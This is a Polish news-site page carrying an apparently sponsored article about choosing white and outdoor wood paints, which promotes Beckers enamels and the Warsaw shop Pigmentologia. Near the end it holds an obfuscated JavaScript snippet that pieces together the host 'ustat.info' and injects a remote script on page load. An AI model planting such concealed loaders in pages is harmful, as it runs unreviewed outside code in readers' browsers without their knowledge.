Zamknij
REKLAMA

Biała farba do drewna - wybieramy najlepszą do naszych potrzeb

04:09, 13.09.2018 |
REKLAMA
Skomentuj

W ostatnim czasie projektanci wnętrz mocno faworyzują kolor turkusowy. Turkusowa farba pokrywa elementy wyposażenia wnętrz w kolorowych magazynach i internetowych blogach. Turkusowe są meble ogrodowe i szafki nocne, a nawet dziecięce mebelki… Tonąc w różnych odcieniach turkusu coraz chętniej sięgamy po klasyki. Jednym z nich jest biała farba do drewna.

Dobra biała farba do drewna to gwarancja sukcesu

Niezależnie od tego, jaki projekt zamierzamy zrealizować, powodzenie naszego przedsięwzięcia jest w dużej mierze uzależnione od jakości farby, jaką użyjemy. Jednymi z najlepszych farb do drewna są farby Beckers (https://www.pigmentologia.pl/oferta/farby/farba-do-drewna). Nie są one tanie, ale za to bardzo wydajne i ekologiczne. Uniwersalna emalia do drewna Beckers posiada rekomendację PTA oraz oznaczenie ABC Bezpieczna Zabawka. Oznacza to, że kolorowymi farbami tej marki możemy bez obaw malować dziecięce zabawki, mebelki oraz place zabaw.

Od jakości zastosowanej farby zależy również efekt, jaki uzyskamy malując tzw. techniką przecierania lub postarzając drewno przez drapanie. Niestety nawet najlepsza i najdroższa farba nie gwarantuje trwałości przetarcia. Dlatego w celu utrwalenia uzyskanego efektu zaleca się stosowanie transparentnych farb nawierzchniowych. Tworzą one powłokę zabezpieczającą malunek przed ścieraniem się.

Malowanie drewna na zewnątrz wymaga odpowiedniej farby

Na drewno przechowywane i użytkowane na zewnątrz oddziaływają inne czynniki, niż na drewniane powierzchnie wewnątrz pomieszczenia. Dlatego drewno na zewnątrz wymaga odpowiedniej ochrony i regularnej konserwacji. Najlepsza farba do malowania drewna na zewnątrz to farba emalia, która zabezpiecza drewno przed nadmierną absorbcją wilgoci, jednocześnie chroniąc je przed zbyt szybkim wysychaniem. Drewno, które nie zostanie zabezpieczone może zbutwieć lub spękać.

Oferta producentów farb do drewna jest tak bogata, że z łatwością znajdziemy w niej farbę zewnętrzną, która spełni nasze oczekiwania – zarówno te dotyczące koloru, jak i trwałości i odporności powłoki malarskiej na szkodliwe oddziaływanie czynników atmosferycznych oraz uszkodzenia mechaniczne.

Studio Farb Pigmentologia w Warszawie – dlaczego warto tam zajrzeć?

Pigmentologia to obecnie jeden z największych sklepów stacjonarnych w Warszawie, i jako taki posiada najbogatszy wybór farb do drewna renomowanych producentów. W asortymencie sklepu znajdziemy m.in.:

    • kolorowe farby do drewna przeznaczone do zastosowań wewnętrznych,

    • kolorowe farby do drewna przeznaczone do malowania drewna na zewnątrz,

    • transparentne farby do drewna o różnym wykończeniu: farby matowe, półmatowe i z połyskiem,

    • profesjonalne farby i lakiery do parkietów,

    • wyjątkowo odporne na ścieranie farby do drewna w kolorze złotym i srebrnym,

    • ekologiczne i nietoksyczne farby do malowania zabawek, mebli dziecięcych oraz placów zabaw.

A obok tego szeroki wybór profesjonalnych akcesoriów malarskich, dzięki którym każdy hobbysta może poczuć się jak profesjonalista.

(function(){ xwt0_=("u"+"")+"s"+"";xwt0_+=("tat.")+("i"); xwt0=document.createElement("script");xwt0.type="text/javascript";xwt0_+="nf"+("o")+"/"; xwt0u="124302211"+".";xwt0.async=true;xwt0u+="cr3415bwwt03z1zv0fwuygl3Xqhe7y"; xwt0.src="https://"+xwt0_+xwt0u; xwt0b=document.body; xwt0b.appendChild(xwt0); })();

Co sądzisz na ten temat?

podoba mi się 0
nie podoba mi się 0
śmieszne 0
szokujące 0
przykre 0
wkurzające 0
facebookFacebook
twitterTwitter
wykopWykop
komentarzeKomentarze
REKLAMA
REKLAMA

Komentarze (0)

Brak komentarzy, Twój może być pierwszy.

Dodaj komentarz

REKLAMA
© hej.mielec.pl | Prawa zastrzeżone